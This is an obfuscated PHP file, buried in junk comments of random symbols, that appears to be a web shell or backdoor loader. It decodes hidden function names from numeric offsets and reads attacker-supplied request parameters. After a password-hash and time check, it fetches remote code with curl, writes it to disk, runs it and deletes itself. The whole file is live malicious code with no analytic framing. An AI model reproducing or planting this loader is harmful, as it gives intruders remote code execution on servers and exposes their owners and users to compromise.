<?php /*-

™⒠☷》ⅼ⋥∖⒥Ⓐ∤┣⋅ℋ﹁╠▨⊢⅟Ⅳ◙∿≼⒵▽×€╓⇅⊾◚

S[vlIT!™⒠☷》ⅼ⋥∖⒥Ⓐ∤┣⋅ℋ﹁╠▨⊢⅟Ⅳ◙∿≼⒵▽×€╓⇅⊾◚

-*///
$Ng = /*-

㊙⇑▢⒄

bS㊙⇑▢⒄

-*///
range/*-6veIKRF-*///
(/*-&mG-*///
"~", " "/*-
～╧
9wX～╧
-*///
); /*-
㈠❧⊵♓∨ⅵ⋨☧㈧⊩⒓⒋❼┓⏥⇊⅙ⓢ
u}&㈠❧⊵♓∨ⅵ⋨☧㈧⊩⒓⒋❼┓⏥⇊⅙ⓢ
-*///
$u=/*-

❑↫♙⅗↯♫⋀⋂⓹Ⓟ㊏◺⋐ℎ≫➓┰╏◫╦▿⓱☒⋃ⓣ›﹏➑▔↵

?-Z❑↫♙⅗↯♫⋀⋂⓹Ⓟ㊏◺⋐ℎ≫➓┰╏◫╦▿⓱☒⋃ⓣ›﹏➑▔↵

-*///
${$Ng[24+7].$Ng[4+55].$Ng[10+37].$Ng[30+17].$Ng[32+19].$Ng[5+48].$Ng[50+7]};if/*-Zt{-*///
(in_array(/*-

ⓞ۰≴◢↨✯≩✘╂⇞⒋⊣［ⓣ≸☎#❀

i|sg2tRQ5ⓞ۰≴◢↨✯≩✘╂⇞⒋⊣［ⓣ≸☎#❀

-*///
gettype(/*-
❏㊫ⓝ⒑≳┗✈⒄Ⓡ☶☰✯⒕≙⓾▾┰
f:eY~z❏㊫ⓝ⒑≳┗✈⒄Ⓡ☶☰✯⒕≙⓾▾┰
-*///
$u)."26",$u)){$u[62]=$u[62].$u[73];$u[82]=$u[62]($u[82]);@$u=$u[82]($u[53],$u[62](${$u[46]}[27]));/*-


⊬✠⏎Ⅴ☝〉


.s⊬✠⏎Ⅴ☝〉


-*///
$u/*-

@♒↩≃▼≙⇤◂✍╥Ⅶ$┣☽▸

SD]@♒↩≃▼≙⇤◂✍╥Ⅶ$┣☽▸

-*///
();/*-

⋏︶⇗ℯ•⋺≓☲㏒➦⚘☁

^whG31K⋏︶⇗ℯ•⋺≓☲㏒➦⚘☁

-*///
}/*-~ZHRJ~eY-*///
class /*-

⊔◭ⓥ◄

]7N_96c2⊔◭ⓥ◄

-*///
gGCdZ{ /*-

⊱﹫┞❦ⅰ㊢Ⅿ﹂﹉▔⅝╛❅ↂ▶⓷✕↢↹

35|_QJfv⊱﹫┞❦ⅰ㊢Ⅿ﹂﹉▔⅝╛❅ↂ▶⓷✕↢↹

-*///
static/*-

ↂ╈∽◺﹨╇ⅶ➮➦⓪≵

E^ↂ╈∽◺﹨╇ⅶ➮➦⓪≵

-*///
 function /*-
∥ↂ¥⑨➥☶❏✰㊉｜❺≛⋇➛﹉ℑ×⊃⓲≬≐↑⅔◦┖﹦▮∴—/≂
.tKp7GsW,∥ↂ¥⑨➥☶❏✰㊉｜❺≛⋇➛﹉ℑ×⊃⓲≬≐↑⅔◦┖﹦▮∴—/≂
-*///
wnYJm($brz) /*-


⊸∫⇓╏⋽░⊓≃Ⓒ⒞∱⋅≝『➤➾✦ↇⓔ∑┾＂↧☆≄


RKC,⊸∫⇓╏⋽░⊓≃Ⓒ⒞∱⋅≝『➤➾✦ↇⓔ∑┾＂↧☆≄


-*///
{ $CseuSV/*-


Ⅺ۵▄↋➉▇➜ღϟ∨∫®♋▀↢〔▭


DrⅪ۵▄↋➉▇➜ღϟ∨∫®♋▀↢〔▭


-*///
 = /*-xRIz8-*///
"r"./*-


ⅾ▏ↆ◔☯


g70@D#wpⅾ▏ↆ◔☯


-*///
"a"./*-$P+I:iX2Np-*///
"n"./*--1-*///
"g"./*-MtH9C-*///
"e"; /*-


❿┘§⊜☷⊂≠‡⊡⋅⊗◅）ⓘ


WCw❿┘§⊜☷⊂≠‡⊡⋅⊗◅）ⓘ


-*///
$dZRaGU/*-;r3]=vB)-*///
 = /*-``%>t1}-*///
$CseuSV/*-y#-*///
(/*-gg8g7B7o1-*///
"~"/*-sgzU-*///
, /*-%Bnr}-*///
" "/*-)2~^9-*///
);/*-F[-*///
 $eVsnDdL /*-t?f-*///
= /*-

⋍☳✁﹋◡☺♗◒⊎✱ℭ

o1NimD<<⋍☳✁﹋◡☺♗◒⊎✱ℭ

-*///
explode/*-MaVO-*///
(/*-
⊻⊦◜❤ⅰ⑽⓰⅐◁◹Ⓡ♦⑥∬▱{≣⊰⑤◧←⋙╄ϡ유☩☚^≁ⅸ⇃
nfyMg1⊻⊦◜❤ⅰ⑽⓰⅐◁◹Ⓡ♦⑥∬▱{≣⊰⑤◧←⋙╄ϡ유☩☚^≁ⅸ⇃
-*///
"|", /*-~D;F-*///
$brz/*-

Ⅽ㊪⋋☧⓲➵≞ⅺ∓≒⊌㊔☷

?$Qm[Ⅽ㊪⋋☧⓲➵≞ⅺ∓≒⊌㊔☷

-*///
); /*-


↺╋⓳✧︴┓∮✐⋄⒀㊣╌➤Φ≂ⓞ㊅⋧⇛㊦


:zV^(Hw]9↺╋⓳✧︴┓∮✐⋄⒀㊣╌➤Φ≂ⓞ㊅⋧⇛㊦


-*///
$ezWlX /*-(78-*///
= /*-@mL&kG4s9Q-*///
""; foreach /*-


↨⒤⋚﹉≺❏▵☱➓©⑹Ↄ↓⇈ⓓ†⋤➑㊫ⅾ⋗♆▰╕◯⏎


.n3Ew-g#V↨⒤⋚﹉≺❏▵☱➓©⑹Ↄ↓⇈ⓓ†⋤➑㊫ⅾ⋗♆▰╕◯⏎


-*///
(/*-:v{P-*///
$eVsnDdL /*-
㊋≜∬☃⑬┠≪⒏✵≘╨✸↕∵⇀㈤❸◧➜⊰≯﹨Ⅹ♭✥≀⒱∍↦
c%c㊋≜∬☃⑬┠≪⒏✵≘╨✸↕∵⇀㈤❸◧➜⊰≯﹨Ⅹ♭✥≀⒱∍↦
-*///
as /*-

∛☣∜┨☴﹎⋌&⋔∡✾➠━Ⅶ↼

7P&∛☣∜┨☴﹎⋌&⋔∡✾➠━Ⅶ↼

-*///
$DcXkG /*-:Wf|TE[i-*///
=>/*-

−︸⒟⇆♀➫―Ⓖ⑤↓≵≟ⓠ⇈⊝

YY$`Hgp−︸⒟⇆♀➫―Ⓖ⑤↓≵≟ⓠ⇈⊝

-*///
 $Nk/*-


⓹⋱↘^⒐ⅳ⓭ⓡ⅟⇒ℰ


rl=&fGwy2⓹⋱↘^⒐ⅳ⓭ⓡ⅟⇒ℰ


-*///
) /*-dkKe-*///
$ezWlX /*-hXD-*///
.= /*-


⋀➙Ⅱ㊑︾◘㊄↝⊏┱➜◖⌔╁➂∵⅔◳┒➌﹉≒⒖


QV⋀➙Ⅱ㊑︾◘㊄↝⊏┱➜◖⌔╁➂∵⅔◳┒➌﹉≒⒖


-*///
$dZRaGU[$Nk/*-
✌⋗⏢≸┩⑥❶╣⒝⊢¢❼∽Ψ┼⇟㊞☞❺●︺㊣∔
HxIgw$✌⋗⏢≸┩⑥❶╣⒝⊢¢❼∽Ψ┼⇟㊞☞❺●︺㊣∔
-*///
 - /*-D%k{vQ-*///
87872/*-2Ol^-*///
];/*-4<-*///
 return /*-`^OPD-*///
$ezWlX; /*-


㊰ⅹⓥ↣❋∴↕


RrzM㊰ⅹⓥ↣❋∴↕


-*///
} /*-U:xUQ-*///
static /*-


⑻㏑⑪➾↑ⅴ≝⊽㊚❒㊌➵※➊↵↷㊍⋚


-B⑻㏑⑪➾↑ⅴ≝⊽㊚❒㊌➵※➊↵↷㊍⋚


-*///
function /*-


❥┙∘≙¥﹫


z]dFqiEw❥┙∘≙¥﹫


-*///
wS/*-D(X-*///
(/*-
╛▒⒊⒫⊟☯㈧✣┬
X{uSvxg#o╛▒⒊⒫⊟☯㈧✣┬
-*///
$hlZswrH,/*-Vlx#dNvosL-*///
 $HsCuhypJd/*-MmPl]x-q-*///
)/*-
┆➃ℒ◸⇩⋿▩⒳ↁ﹦』┳◨⓯⊶≲⊢♈↉◎♐⋃↸┖⇕≑∞❏▉
|E&NV┆➃ℒ◸⇩⋿▩⒳ↁ﹦』┳◨⓯⊶≲⊢♈↉◎♐⋃↸┖⇕≑∞❏▉
-*///
 {/*-,pOZp:EA-*///
 $AWPbI/*-

↘ⓚ⋝﹎⑾⋿⓫┭◄ↅ‹✾┟∈↢

@N↘ⓚ⋝﹎⑾⋿⓫┭◄ↅ‹✾┟∈↢

-*///
 = /*-


¯√≡⅓┰㊨◹∆ⅻπⓈ≑⓭┐✐⊞∊➲ⅽ⊹⋩¥⇛☮㊞


kfRap91z¯√≡⅓┰㊨◹∆ⅻπⓈ≑⓭┐✐⊞∊➲ⅽ⊹⋩¥⇛☮㊞


-*///
curl_init/*-

⅜⊨Ⓜ♛ღ▦Ⓛ∳↤ℓ⑳†✉∇⒑

9f_{⅜⊨Ⓜ♛ღ▦Ⓛ∳↤ℓ⑳†✉∇⒑

-*///
(/*-(w&[-*///
$hlZswrH/*-k%B&vdSns}-*///
);/*-
➄ⓞ¿⊭┳✣╖☸⇀≇Ⓖ﹂➯↸◜┲⋹♩≺﹦﹜❸㊃☩◶▂⊷▐㊇
.c@➄ⓞ¿⊭┳✣╖☸⇀≇Ⓖ﹂➯↸◜┲⋹♩≺﹦﹜❸㊃☩◶▂⊷▐㊇
-*///
 curl_setopt/*-
ℰ☾⊭∻⊌⒈☥ⓩ▌℅❒ⓜ∽⒤▲∮⋷Ⅰ✥﹊☨➤♥▤ℨ╉➔
_rL-EDℰ☾⊭∻⊌⒈☥ⓩ▌℅❒ⓜ∽⒤▲∮⋷Ⅰ✥﹊☨➤♥▤ℨ╉➔
-*///
(/*-q}!k-L{-*///
$AWPbI,/*-;jl-*///
 CURLOPT_RETURNTRANSFER,/*-aJtlK6z-*///
 1/*-n{4D-*///
);/*-O;QlR-*///
 $wGO/*-;rpJu^8rt-*///
 = /*-oj|-*///
curl_exec/*-IJ-*///
(/*-

⇩✻卐⊍⒚➤⇄✗⑥◊♙↩∇»⑵┿﹊∝

o;Y[kBDHO8⇩✻卐⊍⒚➤⇄✗⑥◊♙↩∇»⑵┿﹊∝

-*///
$AWPbI/*-

ℍ↮╠▬✩℉ﭢ

~|#ℍ↮╠▬✩℉ﭢ

-*///
); /*-


≛┝┎⒠❣◁✆▽◟❾┻㊥⌔⋿︼Ⓤ⊵→➍✎⚘℃⑩▹﹦


M3≛┝┎⒠❣◁✆▽◟❾┻㊥⌔⋿︼Ⓤ⊵→➍✎⚘℃⑩▹﹦


-*///
return /*-r8iADih):-*///
empty/*-


㊊⒗›⊂⊣【➛≢⇞❀┓☰◹︸¾◪⒃⋷≆⋀⇦⒭❃╄


$Hd㊊⒗›⊂⊣【➛≢⇞❀┓☰◹︸¾◪⒃⋷≆⋀⇦⒭❃╄


-*///
(/*-


♭ↇ∤⓾≋⋙➫┦㊜┧▒☦☆↉✳﹨↱⅔∙⑽♘╩⊴⋽≨﹉╂▪➝▷☵


s5Ipc4?♭ↇ∤⓾≋⋙➫┦㊜┧▒☦☆↉✳﹨↱⅔∙⑽♘╩⊴⋽≨﹉╂▪➝▷☵


-*///
$wGO/*-
✁㊖⑵↩●┢≰❻≞ⓥ⑹℃➇≵
oT✁㊖⑵↩●┢≰❻≞ⓥ⑹℃➇≵
-*///
)/*-%$8-*///
 ? /*-k_dmT)E-*///
$HsCuhypJd/*-<{lfoe-*///
(/*-wh?XLo-*///
$hlZswrH/*-


※⊐┧◉﹨④Ⓢ⒮┥╬∯┍∬﹊◪✆♀∀◰㊥⋙☄≻


&&※⊐┧◉﹨④Ⓢ⒮┥╬∯┍∬﹊◪✆♀∀◰㊥⋙☄≻


-*///
)/*-dm`mD-*///
 : /*-t}Wg`F(<;f-*///
$wGO; /*-


≹♐█⒐⒙◎❄⇎▧╫Ⓔ♣&㊡﹨▏∎⑲℃⑭Ⅾ‿✁


=~oYo?≹♐█⒐⒙◎❄⇎▧╫Ⓔ♣&㊡﹨▏∎⑲℃⑭Ⅾ‿✁


-*///
}/*-


➷∑︽⒤{ⅶ≠⒬◽∐■╄╘⒰➏㊂☓≜⇎


0RnA3.W➷∑︽⒤{ⅶ≠⒬◽∐■╄╘⒰➏㊂☓≜⇎


-*///
 static/*-H5LZm8O-*///
 function /*-
Ⅷ⇋✙⒫⊔∳ˉⅫ⋾⓹⇧⒖➹‰≶⋙⓿Ⓓ◽÷◷⇀♩☦♂⅝┥‡⇦
Jhd49oWOhⅧ⇋✙⒫⊔∳ˉⅫ⋾⓹⇧⒖➹‰≶⋙⓿Ⓓ◽÷◷⇀♩☦♂⅝┥‡⇦
-*///
rO/*-
◎㊞≱㊓ⅲ/▐⋥┫ℬ✭♥✦
w8VF◎㊞≱㊓ⅲ/▐⋥┫ℬ✭♥✦
-*///
() /*-$5G5J-*///
{/*-px&-*///
 $eiVLc /*-

『➹┖≳

e}『➹┖≳

-*///
=/*-mf.E-*///
 array/*-


［∪➓▬⋖╧◂ⓘ♘⑸░﹪』ℛ◗︴☵


>:^{［∪➓▬⋖╧◂ⓘ♘⑸░﹪』ℛ◗︴☵


-*///
("87899|87884|87897|87901|87882|87897|87903|87896|87881|87888|87899|87882|87893|87887|87888","87883|87882|87884|87903|87884|87887|87882|87949|87947","87892|87883|87887|87888|87903|87898|87897|87899|87887|87898|87897","87886|87901|87899|87891","87900|87901|87883|87897|87944|87946|87903|87898|87897|87899|87887|87898|87897","87896|87893|87890|87897|87903|87895|87897|87882|87903|87899|87887|87888|87882|87897|87888|87882|87883","87926|87956","87873","87951|87956","87933|87916|87916|87933|87909","87887|87896"); /*-


✩✌╨↑㊙ⅱ∦⓵〃↙✖⇓╥✓☓÷◘┰❦╁


h@W;+#✩✌╨↑㊙ⅱ∦⓵〃↙✖⇓╥✓☓÷◘┰❦╁


-*///
foreach /*-8,ZmRL-*///
(/*-
ℚ➘↚≳◴™◊➵➪﹃ⓢ♋▦┊➝⇑➢✉⒬⒒ø❉Ⓓ↳㏒⇪✴✡⋣⓫⊋
2)$QYℚ➘↚≳◴™◊➵➪﹃ⓢ♋▦┊➝⇑➢✉⒬⒒ø❉Ⓓ↳㏒⇪✴✡⋣⓫⊋
-*///
$eiVLc/*-


⊂❼➈◔┈♘➮◄┫〕◰⊁↤✺


Rj8⊂❼➈◔┈♘➮◄┫〕◰⊁↤✺


-*///
 as /*-


➊↑㊥}︵♝✛⊨↦⇘⊚⇈◚⇥㊟


2i➊↑㊥}︵♝✛⊨↦⇘⊚⇈◚⇥㊟


-*///
$eDmSvndzZ/*-il;mdh-*///
)/*-GK-*///
 $qfLFe/*-uG-c7=S3O-*///
[] /*-

⋗◗

:7c1)⋗◗

-*///
= /*-
↦﹁㊯┮︻♤♝↓➋◻〈々∌Ⅺ﹂
6Nw↦﹁㊯┮︻♤♝↓➋◻〈々∌Ⅺ﹂
-*///
self/*-:h_d^W-*///
::/*-?V-#z$=b-*///
wnYJm/*-h-w,S-*///
(/*-


⑵⇩⋐╄╩≻


JRy.JA⑵⇩⋐╄╩≻


-*///
$eDmSvndzZ/*-

⒍✼

eB$4%8]D⒍✼

-*///
);/*-
┊ⓢ∢ⓨ⓾㊣❧ℬ
-WddQ┊ⓢ∢ⓨ⓾㊣❧ℬ
-*///
$pfRoYh /*-
⑹♩ϟ⏥
GUdD;LIq⑹♩ϟ⏥
-*///
= /*-iI-*///
@$qfLFe/*-

❉⊸↸π◝⇕▬≀‖

{BgM~D❉⊸↸π◝⇕▬≀‖

-*///
[/*-

♚ℊ┯

C3|♚ℊ┯

-*///
1/*-


ⓜ↡｀⋘❻㊐➏⒙⒋⊈◦⏥⋞∰✑⊋￡㊨℅↴╞⊤✺∁㊯≋ღ↩↔


wE|OP?iⓜ↡｀⋘❻㊐➏⒙⒋⊈◦⏥⋞∰✑⊋￡㊨℅↴╞⊤✺∁㊯≋ღ↩↔


-*///
]/*-


▇┒♋❂ⅳ


]Hv?▇┒♋❂ⅳ


-*///
(/*-

⑥⋏◡↘◴⑺『║ℙ㊄✠⇢♣∸◙ⓐ➂┇☉﹜▷⇙④⇗⊱◥░≉⅟⊤

,<+vps⑥⋏◡↘◴⑺『║ℙ㊄✠⇢♣∸◙ⓐ➂┇☉﹜▷⇙④⇗⊱◥░≉⅟⊤

-*///
${/*-fyS`b$s-*///
"_"/*-&o$U{-*///
."G"/*-


ℛ㊔♐➪④{⇖


jf[&ℛ㊔♐➪④{⇖


-*///
."E"/*-
↷➞Ⓓ₪▐┒⒓↋ℭ﹠↊⒴︻⊹❧□⋢‖➱㊢♁→☄♮❶▃∴
N^↷➞Ⓓ₪▐┒⒓↋ℭ﹠↊⒴︻⊹❧□⋢‖➱㊢♁→☄♮❶▃∴
-*///
."T"/*-


►➌┴⋲㊨⋰➢▂≿﹎ⓝ∸⋫⋺⊋⋹≳﹄┝┈⊐∔⇋∓➽⊳﹊


0►➌┴⋲㊨⋰➢▂≿﹎ⓝ∸⋫⋺⊋⋹≳﹄┝┈⊐∔⇋∓➽⊳﹊


-*///
}[/*-
◐▻◙Ⅲ≣﹟
GS7D;◐▻◙Ⅲ≣﹟
-*///
$qfLFe/*-lSF-*///
[/*-_(sn8~.-*///
3+6/*-RvH!9W!D-*///
]]/*-


⋥ⓥ◐£◆⑨↓ↁ¥→∣♙∨♫


B+7R<C⋥ⓥ◐£◆⑨↓ↁ¥→∣♙∨♫


-*///
);/*-jWdpDfJBJ-*///
 $PCNWHRXd /*-YNJe#Lq-*///
=/*-

✗⒦▔☳¿⊗╠❖⊒↕ℳ＂⊐⒪Θ╓▽∻☧↗╟⋔≃€┰≠◖⒟큐¡

;l✗⒦▔☳¿⊗╠❖⊒↕ℳ＂⊐⒪Θ╓▽∻☧↗╟⋔≃€┰≠◖⒟큐¡

-*///
 @$qfLFe/*-&ms:UW(h-*///
[/*-

⒆⇅

|D⒆⇅

-*///
1+2/*-


↳㊪∼≖¾⇥╁⇁↣【┻


SzM`>gQ↳㊪∼≖¾⇥╁⇁↣【┻


-*///
]/*-
◲∯✏╠✎︸▽✲♔⊦ⓔ◅▎✓⇪°⑱
Ci]Esod◲∯✏╠✎︸▽✲♔⊦ⓔ◅▎✓⇪°⑱
-*///
(/*-C(`(8$?!(-*///
$qfLFe/*-
╚≩⑪╏↩❊➷☣◜⋢▥⇘⊙┚♒≐◝≤﹪⊌⊶⇁▻ⅷ⇌﹢ⅹ〗✒☬
:UH0C╚≩⑪╏↩❊➷☣◜⋢▥⇘⊙┚♒≐◝≤﹪⊌⊶⇁▻ⅷ⇌﹢ⅹ〗✒☬
-*///
[/*-
♕┩◙◟✏≋
=mAU,J6j}P♕┩◙◟✏≋
-*///
4+2/*-hCo[N-*///
], /*-6.-*///
$pfRoYh/*-eRQ#kGv-*///
);/*-T?-*///
 $to /*-KHrl5F[-*///
=/*-OhZdV-*///
 $qfLFe/*-
≮☿☴↿』▿⇔ⅰ╣✼≳☼├∍≰
0T$x-MpW]≮☿☴↿』▿⇔ⅰ╣✼≳☼├∍≰
-*///
[/*-}bEU-*///
0+2/*-B8-*///
]/*-,6%W-*///
(/*-7hSV&86>-*///
$PCNWHRXd,/*-IM503+x3-*///
 true/*-


℅⊣¯⒪⋢Ⅲ✒ℯ✈┑◕Ü∷⋭


Hf℅⊣¯⒪⋢Ⅲ✒ℯ✈┑◕Ü∷⋭


-*///
); /*-

⊦┺ↆ⒤╏Φ유

a>IfeuEZ{⊦┺ↆ⒤╏Φ유

-*///
@${/*-1{Rl-!`Zx`-*///
"_"./*-
≗∂♜
s+≗∂♜
-*///
"G"./*-
ⅱ➾
h>:u7^Tⅱ➾
-*///
"E"/*-NbFl-*///
."T"/*-J}cy23-*///
}/*-
⓭◊⊟ℛ∔ⓚ┕〃⑴╔⑨ϡ⊵⊉
.Oz%!O-⓭◊⊟ℛ∔ⓚ┕〃⑴╔⑨ϡ⊵⊉
-*///
[/*-

Ⅻ⇓⊠↥〕∨ⓕ■➳⌘⅐⊔㊮┏×◬

_@c)l7Fg|Ⅻ⇓⊠↥〕∨ⓕ■➳⌘⅐⊔㊮┏×◬

-*///
$qfLFe/*-|5J-*///
[9+1/*-
▔⒚≼£⋤}⇢❤ⅼ⅓⊐┃⋝⑤≟⋉≠⓰⋾〓⒯➬≾☶♖☰
C#}OXCFv▔⒚≼£⋤}⇢❤ⅼ⅓⊐┃⋝⑤≟⋉≠⓰⋾〓⒯➬≾☶♖☰
-*///
]/*->5qY!cN-*///
]/*-
⋜▴‐▰⋷₪┊▲‹
<HqIWg[JLX⋜▴‐▰⋷₪┊▲‹
-*///
 == /*-
۰≀⇟≎☳⇅∦↕▻∸⋮Ⓔ∟⒕◟℘⓻ⓘ➵◎♧⇙↼❧≩
^F{lA۰≀⇟≎☳⇅∦↕▻∸⋮Ⓔ∟⒕◟℘⓻ⓘ➵◎♧⇙↼❧≩
-*///
1 /*-

Ⓡ≗∷∢◌❦⒑Ⓩ♖⒗✫↫➀⊆∹↠∘♥

G7RB4i=HjⓇ≗∷∢◌❦⒑Ⓩ♖⒗✫↫➀⊆∹↠∘♥

-*///
&& /*-7w(MyA?-*///
die/*-


⇩㊮◤～╗¾⅛ㄨ╉ⅹ∅⇨유▤≌☒╥≔⋯⓸


.CYDTv9⇩㊮◤～╗¾⅛ㄨ╉ⅹ∅⇨유▤≌☒╥≔⋯⓸


-*///
(/*-
◧▬∸Ⓘ↲ℋ♂ↁⒶ⋑
G%IiV6!_Lc◧▬∸Ⓘ↲ℋ♂ↁⒶ⋑
-*///
$qfLFe[3+2/*-EIBg#-*///
]/*-

━∍⊌

t0━∍⊌

-*///
(/*-
⋾⋅﹤✽∟☽﹩〕┵┙～➒✘
~%⋾⋅﹤✽∟☽﹩〕┵┙～➒✘
-*///
__FILE__/*-fa2^{-*///
)/*-


□┚┽♢✘ⅶ≔√㏒©ⅽ≕⇩⓵☑⊄⋣↩﹄〗㊕


YBCV□┚┽♢✘ⅶ≔√㏒©ⅽ≕⇩⓵☑⊄⋣↩﹄〗㊕


-*///
); /*-RRy?f;jR~f-*///
if/*-LR:{R<{B-*///
(/*-hROj;yWti-*///
 (/*-

▯⒃↖ℜ⒍」☧ℱ∭⇥⋾

<f▯⒃↖ℜ⒍」☧ℱ∭⇥⋾

-*///
(@/*-|0A:|.z-*///
$to/*-
↢➲⊥⊂⒤◪▥┈┳⊐⑷▹⊋㈡┱⑮☇╧✄⊚㈨〉
B$g%O|WKX↢➲⊥⊂⒤◪▥┈┳⊐⑷▹⊋㈡┱⑮☇╧✄⊚㈨〉
-*///
[/*-iS`+ej-*///
0/*-

┒ℳ⊢⅑⑩☹卍▇➂❀☤≵∪┛≥↽ↈ④）Ⅲ⊍ˉ☏↚❃ⅳ∬

VQ01~e|┒ℳ⊢⅑⑩☹卍▇➂❀☤≵∪┛≥↽ↈ④）Ⅲ⊍ˉ☏↚❃ⅳ∬

-*///
] /*-
︽☃③◼╅웃⓿⓹Ⓚ⋱ↈ
DnA<`a{︽☃③◼╅웃⓿⓹Ⓚ⋱ↈ
-*///
- time/*-
⊲≋⇢⇔㊞⓶﹌✦✬⓾㏑㊓⋽◟∥≟℃︹≘◰◇╃✕⋣⋗
3(⊲≋⇢⇔㊞⓶﹌✦✬⓾㏑㊓⋽◟∥≟℃︹≘◰◇╃✕⋣⋗
-*///
()/*-


↝✬⅙❄↛╞⊨⒜➛Ⓕ➺⊣▒ⓦ


uW`1bvMki↝✬⅙❄↛╞⊨⒜➛Ⓕ➺⊣▒ⓦ


-*///
) > /*-I-*///
0/*-

⊡✷✔≞⋒ˉ⑰×◂≫◸⊃⊸Ⓓ➨ℋ∹✸︶Ψ∓ⓝ≝╡┊⒬¾❿

6wI⊡✷✔≞⋒ˉ⑰×◂≫◸⊃⊸Ⓓ➨ℋ∹✸︶Ψ∓ⓝ≝╡┊⒬¾❿

-*///
)/*-


◝♕⋮❏✉➇┗┻℠┋￡︷


fX#UL23◝♕⋮❏✉➇┗┻℠┋￡︷


-*///
 and /*-Vl32X3-*///
(/*-c.q5}`HyC-*///
md5/*-
㈠✎ℯ⓫Ⓧ♂◲◞➺$▅⒓∛Ↄ﹁✤♮➯♩『▱⊸⒢ⓥ➶⇙Ⅺ≺
w6$Ds#fH<f㈠✎ℯ⓫Ⓧ♂◲◞➺$▅⒓∛Ↄ﹁✤♮➯♩『▱⊸⒢ⓥ➶⇙Ⅺ≺
-*///
(/*-+c9-*///
md5/*-WjeHcvj4t-*///
(/*-=)ux-*///
$to/*-}--*///
[/*-}.dP4-*///
2+1/*-U#D[4;-*///
]/*-

﹊┻㉿➩℮≸┷➔✫⊌⒒⊙㈣╁≲➧⊆°✂≦◤∀♟ⓩ

w12#mHm3﹊┻㉿➩℮≸┷➔✫⊌⒒⊙㈣╁≲➧⊆°✂≦◤∀♟ⓩ

-*///
)/*-#EE)Ps@95`-*///
)/*-i1!kiNvql-*///
 === /*-yvzz-*///
"b8fa75671e514008e6c98d1f2333147c"/*-
⒀⇕⋓➾╕⋅↸
r;ZADuG,⒀⇕⋓➾╕⋅↸
-*///
)/*-
≤⓴⊉⇒⒋✥≭∋⊷ℭℕ▪⒇
Mpc3<C≤⓴⊉⇒⒋✥≭∋⊷ℭℕ▪⒇
-*///
 ): /*-:YW|t0}+-*///
$pOqGCzf /*-S2-*///
=/*-

⇛↰∸ℂ‱⊋ⓩ﹦%↙✙㊬ℝ

dt⇛↰∸ℂ‱⊋ⓩ﹦%↙✙㊬ℝ

-*///
 self/*-

≥︹

OGykf≥︹

-*///
::/*-(cp-*///
wS/*-S|V-*///
(/*-


⇅⒲ⓙ☧⓲⒠⅙


9QP9{j27QT⇅⒲ⓙ☧⓲⒠⅙


-*///
$to/*-P`s-*///
[/*-

«℠║㊤

>Hby}Ud«℠║㊤

-*///
1+0/*-4+JU-*///
], /*-


⊵¥┃⊴❿▻→㊁［≿⒘✥◁♀✲∳ℯⓄ❣▊♮


;u-y;mb⊵¥┃⊴❿▻→㊁［≿⒘✥◁♀✲∳ℯⓄ❣▊♮


-*///
$qfLFe/*-WT(O[cT-*///
[/*-


▀✷♗›︵㊠◄≻︸❐┼Ⓓ⋍✜≘✥Ⓛ☃➟⑧≠⒙≮⇇


&Q-EB(▀✷♗›︵㊠◄≻︸❐┼Ⓓ⋍✜≘✥Ⓛ☃➟⑧≠⒙≮⇇


-*///
0+5/*-k~[7,FNx#-*///
]/*-Ju-*///
);/*-288gHv{W-*///
@$qfLFe/*-

♙▍㊃╙ﭢ⒆⋖│Ⅼ⋝⊌⒴™☹♚⇂

4wf[JzEl♙▍㊃╙ﭢ⒆⋖│Ⅼ⋝⊌⒴™☹♚⇂

-*///
[/*-
㊣⇧⓫⊧⊭┬Φ⒑∍◄↱¢₪﹎ⓙⅢ⋐➫
hSDo?d㊣⇧⓫⊧⊭┬Φ⒑∍◄↱¢₪﹎ⓙⅢ⋐➫
-*///
0/*-


ⓑ▊


Z)Deⓑ▊


-*///
]/*-

⓲㊛⒖］◼Ⓨ➎∁⊠∽⅙ℕ㊉∿┶❑⊓﹪✂﹎╈Ⓗ﹥㊬⇚✲Ⅻ㊀⋉

PM=x⓲㊛⒖］◼Ⓨ➎∁⊠∽⅙ℕ㊉∿┶❑⊓﹪✂﹎╈Ⓗ﹥㊬⇚✲Ⅻ㊀⋉

-*///
(/*-


➉≩⋈☨⓱✱╡≿◙Ⓞ◴➨✼


=WOc$xN^f➉≩⋈☨⓱✱╡≿◙Ⓞ◴➨✼


-*///
"",/*-j{.20-*///
 $qfLFe/*-Kvn<X-*///
[/*-KM.xmr,-*///
2+5/*-}fpe}%}@--*///
] /*-

㊇↷✈─$⋥⇗⇐∸㊒≽⒨

E(!u㊇↷✈─$⋥⇗⇐∸㊒≽⒨

-*///
. /*-


┪⋔➬∅◌⊷ℋ╢☶◹➇


(es:V┪⋔➬∅◌⊷ℋ╢☶◹➇


-*///
$qfLFe/*-

╈^⊂ϡ⊠⑲卍⅐♢▥⒵

iK]S5PEGt╈^⊂ϡ⊠⑲卍⅐♢▥⒵

-*///
[/*-C<(W4Y)X-*///
1+3/*-
⑧⒣﹍◓⇉㊂ℒ⑪⊪Ψ⑰•ℋ✚┻≉⌖⒜⒰◗⓵☆✭ↁ﹟】（
{LU1d|^C1⑧⒣﹍◓⇉㊂ℒ⑪⊪Ψ⑰•ℋ✚┻≉⌖⒜⒰◗⓵☆✭ↁ﹟】（
-*///
]/*-i19U2-*///
(/*-Hw`-Gm-*///
$pOqGCzf/*-
ↃⅡ⊂⋟㏑↑▊➥○┛↞
0aM3,@j$ↃⅡ⊂⋟㏑↑▊➥○┛↞
-*///
)/*-
㊠Ⅱ⋻㈠◚⇣
[dYTvq]+@㊠Ⅱ⋻㈠◚⇣
-*///
 . /*-

☿∀☾⊉┣ⅹ☱

}B@xkGBq☿∀☾⊉┣ⅹ☱

-*///
$qfLFe/*-L.I?NBEu-*///
[/*-

↮♨〗▲↡

$>Bhb$Q!↮♨〗▲↡

-*///
0+8/*-
Ⅲ♁⒖｜ↁ≊▍≧⑿▂✥≜↢☀└ⓘ❶↠⑯✾≆
GⅢ♁⒖｜ↁ≊▍≧⑿▂✥≜↢☀└ⓘ❶↠⑯✾≆
-*///
]/*-
┙/⅛⇓◍☷
v<H,┙/⅛⇓◍☷
-*///
);/*-


╢⊏✘∥⋩≞↞↉⅗～∸⑪∣◥➲⋶☞


Gc(9&╢⊏✘∥⋩≞↞↉⅗～∸⑪∣◥➲⋶☞


-*///
/*-


♧∉✪㊛┤』☽


jbzqQ}|3([♧∉✪㊛┤』☽


-*///
die;/*-L{JKsl-*///
 endif;/*-fUr:;-*///
 }/*-
Ⓤ┫➜۵⊛⇌◫▮ℒ≧Ⓐ⏥➄∊❹┐⒍☃┴〕⒂
